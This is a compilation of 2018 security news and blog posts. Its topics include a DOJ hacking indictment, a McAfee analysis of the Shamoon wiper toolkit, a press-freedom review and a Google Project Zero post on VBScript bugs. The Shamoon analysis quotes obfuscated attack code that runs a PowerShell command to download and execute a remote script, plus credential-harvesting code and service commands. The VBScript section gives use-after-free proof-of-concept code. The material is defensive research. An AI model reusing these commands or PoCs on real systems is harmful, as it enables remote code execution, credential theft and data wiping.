Acknowledgements: This post leveraged contributions from Chad Brubaker, Janis Danisevskis, Giles Hogben, Troy Kensinger, Ivan Lozano, Vishwath Mohan, Frank Salim, Sami Tolvanen, Lilian Young, and Shawn Willden.

DOJ charges two Chinese nationals with ‘extensive’ hacking campaign

Today, the Department of Justice announced charges against Zhu Hua and Zhang Shilong, two Chinese nationals who engaged in an extensive hacking campaign against the US and other countries. First reported by CNBC, the campaign allegedly succeeded in infiltrating at least 45 US and global technology companies and government agencies, with these actions taken at the behest of the Chinese government. Incredibly, the hackers have been operating from 2006 through this year, according to the DOJ. This comes a week after the NSA warned it had evidence of China preparing for "high-profile" cyber-attacks.

Source: Department of Justice

$10,000 research fellowships for underrepresented talent

The Trail of Bits SummerCon Fellowship program is now accepting applications from emerging security researchers with excellent project ideas. Fellows will explore their research topics with our guidance and then present their findings at SummerCon 2019. We will be reserving at least 50% of our funding for marginalized, female-identifying, transgender, and non-binary candidates. If you’re interested in applying, read on!

Why we’re doing this

Inclusion is a serious and persistent issue for the infosec industry. According to the 2017 (ISC)2 report on Women in Cybersecurity, only 11% of the cybersecurity workforce identify as women – a deficient proportion that hasn’t changed since 2013. Based on a 2018 (ISC)2 study, the issue is worse for women of color, who report facing pervasive discrimination, unexplained denial or delay in career advancement, exaggerated highlights of mistakes and errors, and tokenism.

Not only is this ethically objectionable, it makes no business sense. In 2012, McKinsey & Company found – with ‘startling consistency’ – that “for companies ranking in the top quartile of executive-board diversity, Returns on Equity (ROE) were 53 percent higher, on average, than they were for those in the bottom quartile. At the same time, Earnings Before Tax and Interest (EBTI) margins at the most diverse companies were 14 percent higher, on average, than those of the least diverse companies.”

The problem is particularly conspicuous at infosec conferences: a dearth of non-white non-male speakers, few female attendees, and pervasive reports of sexual discrimination. That’s why Trail of Bits and one of the longest-running hacker conferences, SummerCon, decided to collaborate to combat the issue. Through this fellowship, we’re sponsoring and mentoring emerging talent that might not otherwise get enough funding, mentorship, and exposure, and then shining a spotlight on their research.

Funding and mentorship to elevate your security research

The Trail of Bits SummerCon Fellowship provides awarded fellows with:

  • $10,000 grant to fund a six-month security research project
  • Dedicated research mentorship from a security engineer at Trail of Bits
  • An invitation to present findings at SummerCon 2019

50% of the program spots are reserved for candidates who are marginalized, people of color, female-identifying, transgender, or non-binary. Applicants of all genders, races, ethnicities, sexual orientations, ages, and abilities are encouraged to apply.

The research topics we’ll support

Applicants should bring a low-level programming or security research project that they’ve been wanting to tackle but have lacked the time or resources to pursue. They’ll have strong skills in low-level or systems programming, reverse engineering, program analysis (including dynamic binary instrumentation, symbolic execution, and abstract interpretation), or vulnerability analysis.

We’re especially interested in research ideas that align with our areas of expertise. That way, we can better support applicants. Think along the lines of:

How do I apply?

Apply here!

We’re accepting applications until January 15th. We’ll announce fellowship recipients in February.

Interested in applying? Go for it!

Submissions will be judged by a panel of experts from the SummerCon foundation, including Trail of Bits. Good luck!

How to Get Technology Working for You This Christmas

Harnessing the power of the internet and technology this Christmas may be just what you need to get through this extraordinarily stressful period. While many of you may be all sorted for the big day, there are still many of us who aren’t.

Many of us are still attending daily Christmas gatherings, still working, still trying to entertain kids, shop & most importantly, work out what we are going to serve to 25 people on Christmas day!!

So, let me share with you my top tips on how we can all use the wonders of the internet and technology to get through:

  1. E-Cards

If you haven’t done these yet – and let’s be honest, very few do now – then scrap this idea immediately. But if your guilt just can’t be silenced, then check out ecards. I personally love Smilebox, but Lifewire has put together a list of the top ecard sites. But remember, always use a reputable site so your recipients are more likely to open them. Cybercrims have been known to send unsuspecting recipients ecards with the aim of trying to extract their personal information.

  2. Online Gift Shopping

Getting to the bottom of the Christmas gift list takes time. So, if you still have presents to buy then avoid the crowds and get online. There are still plenty of retailers who are guaranteeing delivery before Christmas. So, make yourself a cup of tea and set the timer for an hour. You’ll be surprised how much you can get done when you have a deadline! has put together a list of the top 50 Australian shopping sites – check it out! I do have to disclose I have a soft spot for Peter’s of Kensington, Country Road and Myer online. Great service and speedy delivery!

But please remember to observe safe online shopping habits. Only buy from trusted retailers, look for a padlock at the start of a web address to ensure transactions are encrypted, avoid offers that are ‘too good to be true’ and don’t ever use public Wi-Fi to do your shopping.

  3. Get Some Extra Help Online

If you haven’t yet used Airtasker to help you work through your to-do list, then you need to start ASAP. Airtasker brings jobs and helpers together in an easy-to-use app. If your house needs a clean or the garden needs a makeover before the relatives arrive, then log on, create a job and wait for Airtaskers to bid on it. So easy!

  4. Create an Online To-Do List

There’s nothing like a bit of planning to reduce pressure. Why not create a to-do list in Google Docs or an Excel spreadsheet to identify which family member is responsible for what on the big day? Alternatively, you could create your to-do list in an app like Todoist and then send each person’s task directly to their inbox? Very organised indeed!

So, let’s all take a deep breath. Christmas 2018 is going to be fantastic. Let’s get technology working for us so we can get through our to-do lists and be super parents – even though we all know they just don’t exist!

Merry Christmas

Alex xx

The post How to Get Technology Working for You This Christmas appeared first on McAfee Blogs.

All I want for Christmas: A CISO’s Wishlist!

As Christmas fast approaches, CISOs and cyber security experts around the world are busy putting plans in place for 2019 and reflecting on what could have been done differently this year. The high-profile data breaches have been no secret - from British Airways to Dixons Carphone to Ticketmaster - and the introduction of GDPR in May 2018 sent many IT professionals into a frenzy to ensure practices and procedures were in place to become compliant with the new regulation.

What the introduction of GDPR did demonstrate was that organisations should no longer focus on security strategies that protect the organisation’s network, but instead on Information Assurance (IA), which protects an organisation’s data. After all, if an organisation’s data is breached, not only will it face the fallout of reputational damage, hits to its bottom line and future prospecting difficulties, but it will also be liable for regulatory fines – up to €20 million, or 4% of annual global turnover, under GDPR. Stolen or compromised data is, therefore, an enormous risk to an organisation.

So, with the festivities upon us and many longing to see gifts under the tree, CISOs may be thinking about what they want for Christmas this year to make sure their organisation is kept secure into the new year and beyond. Paul German, CEO, Certes Networks, outlines three things that should be at the top of the list. 

1. Backing from the Board
Every CISO wants buy-in from the Board; and there’s no escaping from the fact that cyber security must become a Board-level priority. However, whilst the correct security mindset must start at the top, in reality it also needs to be embedded across all practices within an organisation; extending beyond the security team to legal, finance and even marketing. The responsibility of securing the entirety of the organisation’s data sits with the CISO, but the catastrophic risks of a cybersecurity failure means that it must be given consideration by the entire Board and become a top priority in meeting business objectives. Quite simply, a Board that acknowledges the importance of having a robust, innovative and comprehensive strategy in place is a CISO’s dream come true.

2. A Simple Approach
A complicated security strategy is the last thing any CISO wants to manage. The industry has over-complicated network security for too long and has fundamentally failed. As organisations have layered technology on top of technology, not only has the technology stack itself become complex, but the resources and operational overhead needed to manage it have contributed to mounting costs. A much simpler approach is needed: start with a security overlay that covers the networks, independent of the infrastructure, rather than taking the narrow approach of building the strategy around the infrastructure. From a data security perspective, the network must become irrelevant, and from this flows a natural simplicity of approach.

3. A Future-Proof Solution
The cyber landscape is constantly evolving, with new threats introduced and new technology appearing that adds to the sophisticated tools hackers have at their disposal. What a CISO longs for is a solution that keeps the organisation’s data secure, irrespective of new users or applications added, and regardless of location or device. By adopting a software-defined approach to data security – centrally enforcing capabilities such as software-defined application access control, data-in-motion privacy, cryptographic segmentation and a software-defined perimeter – CISOs can ensure that data is protected in its entirety on its journey across whatever network it traverses, while hackers are restricted from moving laterally across the network once a breach has occurred. Furthermore, the solution can protect an organisation’s data not only in its present state, but into the future. Because the solution is software-defined, a CISO can centrally orchestrate the security policy without impacting network performance, and changes can be made to the policy without pausing the protection in place.

Three Simple Wishes
High-profile data breaches won’t go away any time soon, so it is the organisations with the correct mindset – Board-level buy-in and a unified approach to securing data – that will see the long-term advantages. Complicated, static and siloed approaches to securing an organisation’s data should be a thing of the past. The good news is that, in reality, everything on a CISO’s Christmas wish list is attainable (although it can’t be wrapped), and should become a reality in the new year.

Paul German, CEO, Certes Networks

The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite

Today, we are all pretty reliant on our mobile technology. From texting, to voice messaging, to mobile banking, we have a world of possibilities at our fingertips. But what happens when the bad guys take advantage of our reliance on mobile and IoT technology to threaten our cybersecurity? According to the latest McAfee Labs Threats Report, cybercriminals are leveraging fake apps and banking trojans to access users’ personal and financial information. In fact, our researchers saw an average of 480 new threats per minute and a sharp increase in malware targeting IoT devices during the last quarter. Let’s take a look at how these cyberthreats gained traction over the past few months.

While new mobile malware declined by 24% in Q3, our researchers did notice some unusual threats fueled by fake apps. Back in June, we observed a scam where crooks released YouTube videos with fake links disguised as leaked versions of Fortnite’s Android app. If a user clicked on the link to download this phony app, they would be asked to provide mobile verification. This verification process would prompt them to download app after app, putting money right in the cybercriminals’ pockets for increased app downloads.

Another fake app scheme that caught the attention of our researchers was Android/TimpDoor. This SMS phishing campaign tricked users into clicking on a link sent to them via text. The link would direct them to a fabricated web page urging them to download a fake voice messaging app. Once the victim downloaded the fake app, the malware would begin to collect the user’s device information. Android/TimpDoor would then be able to let cybercriminals use the victim’s device to access their home network.

Our researchers also observed some peculiar behavior among banking trojans, a type of malware that disguises itself as a genuine app or software to obtain a user’s banking credentials. In Q3, cybercriminals employed uncommon file types to carry out spam email campaigns, accounting for nearly 500,000 emails sent worldwide. These malicious phishing campaigns used phrases such as “please confirm” or “payment” in the subject line to manipulate users into thinking the emails were of high importance. If a user clicked on the message, the banking malware would be able to bypass the email protection system and infect the device. Banking trojans were also found using two-factor operations in web injects, or packages that can remove web page elements and prevent a user from seeing a security alert. Because these web injects removed the need for two-factor authentication, cybercriminals could easily access a victim’s banking credentials from right under their noses.

But don’t worry – there’s good news. By reflecting on the evolving landscape of cybersecurity, we can better prepare ourselves for potential threats. Therefore, to prepare your devices for schemes such as these, follow these tips:

  • Go directly to the source. Websites like YouTube are often prone to links for fake websites and apps so criminals can make money off of downloads. Avoid falling victim to these frauds and only download software straight from a company’s home page.
  • Click with caution. Only click on links in text messages that are from trusted sources. If you receive a text message from an unknown sender, stay cautious and avoid interacting with the message.
  • Use comprehensive security. Whether you’re using a mobile banking app on your phone or browsing the internet on your desktop, it’s important to safeguard all of your devices with an extra layer of security. Use a robust security software like McAfee Total Protection so you can connect with confidence.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Results Are In: Fake Apps and Banking Trojans Are A Cybercriminal Favorite appeared first on McAfee Blogs.

It’s the most wonderful time of the year – Patching

does that say patching plaster or patch faster? 😉

Remember back when the summer and Christmas breaks were the high times of concern? The kids were out of college and ready to try out their skills. Christmas was worse because so many people were out of the office; no one would notice an intrusion, and if they did, the response would be limited. Now that’s what we call a Tuesday afternoon. These days, sysadmins have to deal not just with college code projects, but with insider threats, financially motivated attackers, and nation states.

This week, Microsoft’s “out-of-band” security update reminded me of the old times. An out-of-band update is simply an unscheduled one: it’s released outside the regular schedule because the vulnerability it fixes is already being exploited, which lends a sense of urgency. Some companies may have already skipped the December updates because of staffing or scheduling, and anyone in retail certainly has a change freeze in effect. Now, on top of that, there is a special update for Internet Explorer.

Information about the update for Internet Explorer is available here:

The post It’s the most wonderful time of the year – Patching appeared first on Roger's Information Security Blog.

Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems

Last week the McAfee Advanced Threat Research team posted an analysis of a new wave of Shamoon “wiper” malware attacks that struck several companies in the Middle East and Europe. In that analysis we discussed one difference from previous Shamoon campaigns: the latest version has a modular approach that allows the wiper to be used as a standalone threat.

After further analysis of the three versions of Shamoon and based on the evidence we describe here, we conclude that the Iranian hacker group APT33—or a group masquerading as APT33—is likely responsible for these attacks.

In the Shamoon attacks of 2016–2017, the adversaries used both the Shamoon Version 2 wiper and the wiper Stonedrill. In the 2018 attacks, we find the Shamoon Version 3 wiper as well as the wiper Filerase, first mentioned by Symantec.

These new wiper samples (Filerase) differ from Shamoon Version 3, which we analyzed last week. The latest Shamoon appears to be part of a toolkit with several modules. We identified the following modules:

  • OCLC.exe: Reads a list of targeted computers created by the attackers and is responsible for running the second tool, spreader.exe, against each targeted machine.
  • Spreader.exe: Spreads the file eraser to each machine on the list. It also gets information about the OS version.
  • SpreaderPsexec.exe: Similar to spreader.exe but uses psexec.exe to remotely execute the wiper.
  • SlHost.exe: The new wiper, which browses the targeted system and deletes every file.

The attackers have essentially packaged an old version (V2) of Shamoon with an unsophisticated toolkit coded in .Net. This suggests that multiple developers have been involved in preparing the malware for this latest wave of attacks. In our last post, we observed that Shamoon is a modular wiper that can be used by other groups. With these recent attacks, this supposition seems to be confirmed. We have learned that the adversaries prepared months in advance for this attack, with the wiper execution as the goal.

This post provides additional insight about the attack and a detailed analysis of the .Net tool kit.

Geopolitical context

The motivation behind the attack is still unclear. Shamoon Version 1 attacked just two targets in the Middle East. Shamoon Version 2 attacked multiple targets in Saudi Arabia. Version 3 went after companies in the Middle East by using their suppliers in Europe, in a supply chain attack.

Inside the .Net wiper, we discovered the following ASCII art:

These characters resemble the Arabic text تَبَّتْ يَدَا أَبِي لَهَبٍ وَتَبَّ. This is a phrase from the Quran (Surah Masad, Ayat 1 [111:1]) that means “perish the hands of the Father of flame” or “the power of Abu Lahab will perish, and he will perish.” What does this mean in the context of a cyber campaign targeting energy industries in the Middle East?

Overview of the attack


How did the malware get onto the victim’s network?

We received intelligence that the adversaries had created websites closely resembling legitimate domains which carry job offerings. For example:

  • Hxxp://

Many of the URLs we discovered were related to the energy sector operating mostly in the Middle East. Some of these sites contained malicious HTML application files that execute other payloads. Other sites lured victims to login using their corporate credentials. This preliminary attack seems to have started by the end of August 2018, according to our telemetry, to gather these credentials.

A code example from one malicious HTML application file:

YjDrMeQhBOsJZ = “WS”

wcpRKUHoZNcZpzPzhnJw = “crip”

RulsTzxTrzYD = “t.Sh”

MPETWYrrRvxsCx = “ell”

PCaETQQJwQXVJ = (YjDrMeQhBOsJZ + wcpRKUHoZNcZpzPzhnJw + RulsTzxTrzYD + MPETWYrrRvxsCx)

OoOVRmsXUQhNqZJTPOlkymqzsA=new ActiveXObject(PCaETQQJwQXVJ)
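To make the obfuscation easier to follow: the fragment assignments above simply assemble the name of the COM object being instantiated. A small Python sketch (fragment values copied from the snippet, variable names shortened for clarity) reproduces the concatenation:

```python
# The four string fragments from the malicious HTML application,
# in the order they are concatenated.
fragments = ["WS", "crip", "t.Sh", "ell"]

# The obfuscated variable passed to ActiveXObject ends up holding:
com_object = "".join(fragments)
print(com_object)  # WScript.Shell
```

Instantiating WScript.Shell is what gives the script the ability to spawn the command shell described below.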


zhKokjoiBdFhTLiGUQD = “d.e”

KoORGlpnUicmMHtWdpkRwmXeQN = “xe”

KoORGlpnUicmMHtWdp = “.”

KoORGlicmMHtWdp = “(‘*****.ps1’)‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -w 1 IEX (New-Object Net.WebClient)’+KoORGlpnUicmMHtWdp+’downloadstring’+KoORGlicmMHtWdp)‘%windir%\\System32\\’ + FKeRGlzVvDMH + ‘ /c powershell -window hidden -enc

The preceding script opens a command shell on the victim’s machine and downloads a PowerShell script from an external location. From another location, it loads a second file to execute.

We discovered one of the PowerShell scripts. Part of the code shows they were harvesting usernames, passwords, and domains:

function primer {

if ($env:username -eq "$($env:computername)$"){$u="NT AUTHORITY\SYSTEM"}else{$u=$env:username}




With legitimate credentials to a network, it is easy to log in and spread the wipers.

.Net tool kit

The new wave of Shamoon is accompanied by a .Net tool kit that spreads Shamoon Version 3 and the wiper Filerase.

This first component (OCLC.exe) reads two text files stored in two local directories. Directories “shutter” and “light” contain a list of targeted machines.

OCLC.exe starts a new hidden command window process to run the second component, spreader.exe, which spreads the Shamoon variant and Filerase with the concatenated text file as parameter.

The spreader component takes as a parameter the text file that contains the list of targeted machines and the Windows version. It first checks the Windows version of the targeted computers.

The spreader places the executable files (Shamoon and Filerase) into the folder Net2.

It creates a folder on remote computers: C:\\Windows\System32\Program Files\Internet Explorer\Signing.

The spreader copies the executables into that directory.

It runs the executables on the remote machine by creating a batch file in the administrative share \\RemoteMachine\admin$\\process.bat. This file contains the path of the executables. The spreader then sets up the privileges to run the batch file.

If anything fails, the malware creates the text file NotFound.txt, which contains the name of the machine and the OS version. This can be used by the attackers to track any issues in the spreading process.

The following screenshot shows the “execute” function:

If the executable files are not present in the folder Net2, it checks the folders “all” and Net4.

To spread the wipers, the attackers included an additional spreader using Psexec.exe, an administration tool used to remotely execute commands.

The only difference is that this spreader uses psexec, which is supposed to be stored in Net2 on the spreading machine. It could be used on additional machines to move the malware further.

The wiper contains three options:

  • SilentMode: Runs the wiper without any output.
  • BypassAcl: Escalates privileges. It is always enabled.
  • PrintStackTrace: Tracks the number of folders and files erased.

The BypassAcl option is always “true” even if the option is not specified. It enables the following privileges:

  • SeBackupPrivilege
  • SeRestorePrivilege
  • SeTakeOwnershipPrivilege
  • SeSecurityPrivilege

To find a file to erase, the malware uses function GetFullPath to get all paths.

It erases each folder and file.

The malware browses every file in every folder on the system.

To erase all files and folders, it first removes the “read only” attributes to overwrite them.

It changes the creation, write, and access date and time to 01/01/3000 at 12:01:01 for each file.

The malware rewrites each file two times with random strings.

It starts to delete the files using the API CreateFile with the ACCESS_MASK DELETE flag.

Then it uses FILE_DISPOSITION_INFORMATION to delete the files.

The function ProcessTracker has been coded to track the destruction.


In the 2017 wave of Shamoon attacks, we saw two wipers; we see a similar feature in the December 2018 attacks. Using the “tool kit” approach, the attackers can spread the wiper module through the victims’ networks. The wiper is not obfuscated and is written in .Net code, unlike the Shamoon Version 3 code, which is encrypted to mask its hidden features.

Attributing this attack is difficult because we do not have all the pieces of the puzzle. We do see that this attack is in line with the Shamoon Version 2 techniques. Political statements have been a part of every Shamoon attack. In Version 1, the image of a burning American flag was used to overwrite the files. In Version 2, the picture of a drowned Syrian boy was used, with a hint of Yemeni Arabic, referring to the conflicts in Syria and Yemen. Now we see a verse from the Quran, which might indicate that the adversary is related to another Middle Eastern conflict and wants to make a statement.

When we look at the tools, techniques, and procedures used during the multiple waves, and by matching the domains and tools used (as FireEye described in its report), we conclude that APT33 or a group attempting to appear to be APT33 is behind these attacks.



The files we detected during this incident are covered by the following signatures:

  • Trojan-Wiper
  • RDN/Generic.dx
  • RDN/Ransom

Indicators of compromise


  • OCLC.exe: d9e52663715902e9ec51a7dd2fea5241c9714976e9541c02df66d1a42a3a7d2a
  • Spreader.exe: 35ceb84403efa728950d2cc8acb571c61d3a90decaf8b1f2979eaf13811c146b
  • SpreaderPsexec.exe: 2ABC567B505D0678954603DCB13C438B8F44092CFE3F15713148CA459D41C63F
  • Slhost.exe: 5203628a89e0a7d9f27757b347118250f5aa6d0685d156e375b6945c8c05eb8a

File paths and filenames

  • C:\net2\
  • C:\all\
  • C:\net4\
  • C:\windows\system32\
  • C:\\Windows\System32\Program Files\Internet Explorer\Signing
  • \\admin$\process.bat
  • NothingFound.txt
  • MaintenaceSrv32.exe
  • MaintenaceSrv64.exe
  • SlHost.exe
  • OCLC.exe
  • Spreader.exe
  • SpreaderPsexec.exe

Some command lines

  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat
  • cmd.exe /c “ping -n 30 >nul && sc config MaintenaceSrv binpath= C:\windows\system32\MaintenaceSrv64.exe LocalService” && ping -n 10 >nul && sc start MaintenaceSrv
  • MaintenaceSrv32.exe LocalService
  • cmd.exe /c “”C:\Program Files\Internet Explorer\signin\MaintenaceSrv32.bat ” “
  • MaintenaceSrv32.exe service






The post Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems appeared first on McAfee Blogs.

The U.S. Press Freedom Tracker in 2018: Year two of documenting attacks on the press in the Trump era


Footage from a Denver police officer's body camera shows officers handcuffing Colorado Independent editor Susan Greene.

In June, a man entered the newsroom of the Capital Gazette in Annapolis, Maryland, and shot and killed four journalists and a media worker. Their names were Rob Hiaasen, Gerald Fischman, John McNamara, Wendi Winters, and Rebecca Smith. It emerged later that the shooter had been harassing and threatening the Gazette for years.

Earlier this year, independent music journalist Zachary Stoner was also shot and killed, bringing the total number of members of the press killed in the United States in 2018 to five. (The US Press Freedom Tracker has not established the motive in the murder of Stoner, but there are some indications that it could be related to his work.)

Before 2018, the last time a journalist was killed in direct reprisal for their work in the United States was in 2007, with the murder of Oakland-based reporter Chauncey Bailey. In 2017, when the US Press Freedom Tracker—a reporting website and database attempting to systematically document press freedom violations in the United States—launched, we did not anticipate the need to track the number of murdered journalists, or to add a “killed” tag to the Tracker’s incident database.

The journalistic landscape in the United States is volatile, and 2018 has been a harrowing year for press freedom. The Tracker has documented more than 100 press freedom incidents since January, from murders and physical attacks to stops at the border and legal orders.

2018 saw an aggressive uptick in the number of leak investigations by the Trump administration compared to 2017. Five government employees or contractors have been charged with allegedly sharing information with the press—Reality Winner, Terry Albury, Joshua Schulte, James Wolfe, and Natalie Mayflower Sours Edwards—and there could be others that have not been publicly reported.

Fewer journalists were arrested in 2018 than in 2017, a year marked by large protests at which numerous members of the press were arrested. The number is still disturbing: at least 11 journalists were arrested while doing their jobs this year. In 2018, some journalists were arrested at protests, while others were arrested while documenting police interactions and courtroom proceedings.

Leak cases

Cases counted in 2017: 1
Cases in 2018: 4

Since 2008, the United States government has aggressively prosecuted journalistic sources. In eight years, the Obama Justice Department brought charges against at least eight people accused of leaking to journalists—Thomas Drake, Shamai Leibowitz, Stephen Kim, Chelsea Manning, Donald Sachtleben, Jeffrey Sterling, John Kiriakou, and Edward Snowden.

At the end of 2017, the Trump Justice Department had prosecuted one government contractor in connection with a leak case—Reality Winner. But by the end of 2018, the Tracker had documented another four cases—a significant uptick, bringing the total number of prosecutions under Trump to five.

Terry Albury became the first person to be charged under the Espionage Act in 2018. In April, he pled guilty to disclosing confidential government information, and was sentenced in October to four years in prison. While the news organization in question was not named in the charges against Albury, reporting has identified it as The Intercept, and he is assumed to have shared information about targeted FBI surveillance of minorities and monitoring of journalists.


Terry Albury

The most recent known leak case is that of Treasury official Natalie Mayflower Sours Edwards, who was arrested and charged in October and stands accused of giving details about suspicious banking transactions to a reporter at BuzzFeed News. The Justice Department has indicated it is investigating dozens more.

Legal orders and subpoenas

Cases counted in 2017: 6
Cases in 2018: 21

The Tracker counts legal orders made by state and federal government agencies against journalists, such as subpoenas from prosecutors for journalists to produce their reporting materials or testify in court. It also includes legal orders sought by private entities on behalf of public officials—such as an October subpoena, issued by a private attorney for a Chicago police officer, for independent journalist Jamie Kalven to testify in a trial.

Kalven fought the subpoena—arguing that reporter’s privilege protects him from testifying about his reporting—and won. It wasn’t the first time—Kalven was also subpoenaed to testify and reveal his confidential sources at the end of 2017 in a different case.

The Department of Homeland Security also subpoenaed the editor of an immigration law journal in an attempt to identify the source of a leaked ICE memo, which the editor of the journal had published.

The Tracker has documented a total of 27 subpoena or legal order cases—with 21 of those occurring in 2018. It’s likely that many subpoenas go unreported, and many legal orders for journalists’ records are conducted with high levels of secrecy. The number of legal order and subpoena cases counted by the Tracker is therefore likely a severe undercount, making straight comparisons of the data between years difficult.

2018 also saw the first publicly known seizure by the Trump administration of a journalist’s communications records, when the Department of Justice seized years of New York Times reporter Ali Watkins’ phone and email records as part of an investigation into her confidential sources. She was notified of this seizure after the fact, so she had no way to challenge the seizure in court.

Physical attacks
Cases in 2017: 53
Cases in 2018: 35

Across the country, journalists were attacked and interfered with by police and protesters in the course of their reporting. A freelance journalist was ‘decked in the face’ by a police officer in August, and a police officer body-slammed and shoved other reporters covering the same rally. On other occasions, journalists were pushed to the ground and shot with “less-lethal” rounds by police.

Reporters covering rallies were also attacked by far-right protesters in 2018—Portland Mercury reporter Kelly Kenoyer was shoved in July by a right-wing demonstrator, and independent journalist Jon Ziegler was struck with a shield by white nationalists while reporting in January.

It’s a physical attack when a journalist faces violence, injury, equipment damage, or aggressive interference as the result of a targeted act by a public or private individual. We’ve documented 35 such incidents this year.

When explosive devices were sent to CNN headquarters in New York City in October, that too constituted a physical attack. The entire bureau was quickly evacuated and the NYPD bomb squad was dispatched; CNN employees were permitted to return once the building was cleared.

Another suspicious package addressed to CNN was found later at a post office in Georgia, near CNN’s global headquarters.


When a pipe bomb forced the evacuation of CNN's New York bureau, anchors Poppy Harlow and Jim Sciutto used cell phones to report on the situation from a street corner outside CNN's offices.

Arrests
Cases in 2017: 33
Cases in 2018: 11

Journalists were arrested doing their jobs at least 11 times in 2018, compared to 33 in 2017. While the 2018 numbers are lower than the year before, the circumstances around the bulk of the arrests are strikingly similar.

In both years, journalists were arrested at protests—specifically, fascist and anti-fascist demonstrations, and in several cases, protests against pipeline construction. In 2017, there were two events at which large numbers of journalists were arrested—protests on Trump’s Inauguration Day in January and protests against the Dakota Access Pipeline. There were comparatively fewer arrests in 2018.

Photojournalist Michael Nigro was arrested while documenting an act of civil disobedience in Missouri, and freelance reporter Karen Savage was arrested multiple times in the course of covering a pipeline resistance protest in Louisiana’s Atchafalaya River Basin.

In one case, Savage said that after arresting her, sheriff’s deputies put her in the back of a police car and drove around through sugar cane fields for around an hour. “It was a very clear intimidation tactic to stop me from covering the story,” Savage said.

“I will go back,” she added. “I’m not going to let them intimidate me. It’s our job to hold these officials accountable.”

While covering a protest in Tennessee this April, Manuel Duran was also arrested. All charges against him were quickly dropped, but he was transferred to the custody of Immigration and Customs Enforcement (ICE) and has remained in ICE detention since the spring. “I was doing my work and nothing more, like any other journalist does,” he said.

And at least two journalists were arrested while taking photographs of police: Susan Greene, after photographing a police interaction in Denver, and Edgar Mendez, for “trespassing” onto police property to take pictures of squad cars for a story.

“I wondered afterwards if what happened to me was because of my brown skin, or because I was a reporter writing about the MPD,” Mendez wrote in a first-person account of the incident for the Neighborhood News Service. “You have to remember that my arrest occurred at a time when President Trump had attacked people of Hispanic descent, repeatedly declared that all the news he didn’t agree with was “fake news,” and begun to call the press the “enemy of the people,” a sentiment he continues to espouse.”

We have attempted to systematically count press freedom violations in the United States since January 2017, the month that Trump entered into office. Much of the rhetoric about the press freedom climate in the United States has focused on President Trump.

We have documented numerous threats and chilling statements by Trump, and other administration officials like ex-Attorney General Jeff Sessions, that pose serious threats to journalism in the United States.

The Trump administration has charged at least five alleged sources of journalists with crimes in less than two years in office—a pace that would shatter the Obama administration’s record on leak prosecutions. Trump has threatened his critics, seized a reporter’s communications in pursuit of her source, and blamed journalists for “creating violence.” His Department of Justice has secretly charged WikiLeaks founder Julian Assange, and if the charges in question relate to Assange’s publishing activities, the press freedom implications would be profoundly devastating. And in November, Trump revoked the press credentials of a reporter that persistently asked him a follow-up question.

But journalists faced diverse threats in the United States while reporting the news in 2018, and many of them have nothing to do with Trump. The journalistic landscape has continued to shift since we began counting incidents at the US Press Freedom Tracker, and we will continue to document threats to free expression as they evolve in coming years.

Note: The categories and cases above do not represent all of the types of incidents that the US Press Freedom Tracker documents; the Tracker catalogs incidents in more than a dozen categories, and the full database is available here. The Tracker also maintains an API endpoint and a link to easily download our data.

On VBScript

Posted by Ivan Fratric, Google Project Zero


Vulnerabilities in the VBScript scripting engine are a well-known way to attack Microsoft Windows. To reduce this attack surface, in the Windows 10 Fall Creators Update, Microsoft disabled VBScript execution in Internet Explorer in the Internet Zone and the Restricted Sites Zone by default. Yet this did not deter attackers from using it: in 2018 alone, there have been at least two instances of 0day attacks using vulnerabilities in VBScript, CVE-2018-8174 and CVE-2018-8373. In both cases, the exploit was delivered via a Microsoft Office file with an embedded object that caused malicious VBScript code to be processed by the Internet Explorer engine. For a more detailed analysis of the techniques used in these exploits, please refer to the analyses by the original discoverers here and here.

Because of this dubious popularity of VBScript, multiple security researchers took up the challenge of finding (and reporting) other VBScript vulnerabilities, including a number of variants of those used in the wild. Notably, researchers working with the Zero Day Initiative discovered multiple vulnerabilities relying on the VBScript Class_Terminate callback, and Yuki Chen of the Qihoo 360 Vulcan Team discovered multiple variants of CVE-2018-8174 (one of the exploits used in the wild).

As a follow-up to those events, this blog post tries to answer the following questions: despite all of the existing efforts from Microsoft and the security community, how easy is it to still discover new VBScript vulnerabilities? And how strong are the Windows policies intended to stop these vulnerabilities from being exploited?

Even more VBScript vulnerabilities

The approach we used to find VBScript vulnerabilities was quite straightforward: we used the already published Domato grammar fuzzing engine and wrote a grammar describing the built-in VBScript functions, various callbacks, and other common patterns. This is the same approach we previously used successfully to find multiple vulnerabilities in the JScript scripting engine, and it was relatively straightforward to do the same for VBScript. The grammar and the generator script can be found here.

This approach uncovered three new VBScript vulnerabilities, which we reported to Microsoft and which are now fixed. The vulnerabilities are interesting not because they are complex, but for precisely the opposite reason: they are pretty straightforward, yet somehow survived to this day. Additionally, in several cases there are parallels that can be drawn between the vulnerabilities used in the wild and the ones we found.

To demonstrate this, before taking a look at the first vulnerability the fuzzer found, let’s take a look at a PoC for the latest VBScript 0day found in the wild:

Class MyClass
 Dim array
 Private Sub Class_Initialize
   ReDim array(2)
 End Sub

 Public Default Property Get P
   ReDim preserve array(1)
 End Property
End Class

Set cls = new MyClass
cls.array(2) = cls

Trend Micro has a more detailed analysis, but in short, the most interesting line is

cls.array(2) = cls

In it, the left side is evaluated first and the address of the variable at cls.array(2) is computed. Then the right side is evaluated, and because cls is an object of type MyClass, which has a default property getter, this triggers a callback. Inside the callback the array is resized, so the previously computed address is no longer valid—it now points to freed memory. When the line above finishes executing, it writes to that freed memory.

Now, let’s compare this sample to the PoC for the first issue we found:

Class MyClass
 Private Sub Class_Terminate()
 End Sub
End Class

Set dict = CreateObject("Scripting.Dictionary")
Set dict.Item("foo") = new MyClass
dict.Item("foo") = 1

At first glance, this might not appear all that similar, but in reality the two are. The line that triggers the issue is

dict.Item("foo") = 1

In it, once again, the left side is evaluated first and the address of dict.Item("foo") is computed. Then a value is assigned to it, but because there is already a value there, it needs to be cleared first. Since the existing value is of type MyClass, this results in a Class_Terminate() callback, in which the dict is cleared. This, once again, means that the address computed when evaluating the left side of the expression now points to freed memory.

In both of these cases, the pattern is:
  1. Compute the address of a member variable of some container object
  2. Assign a value to it
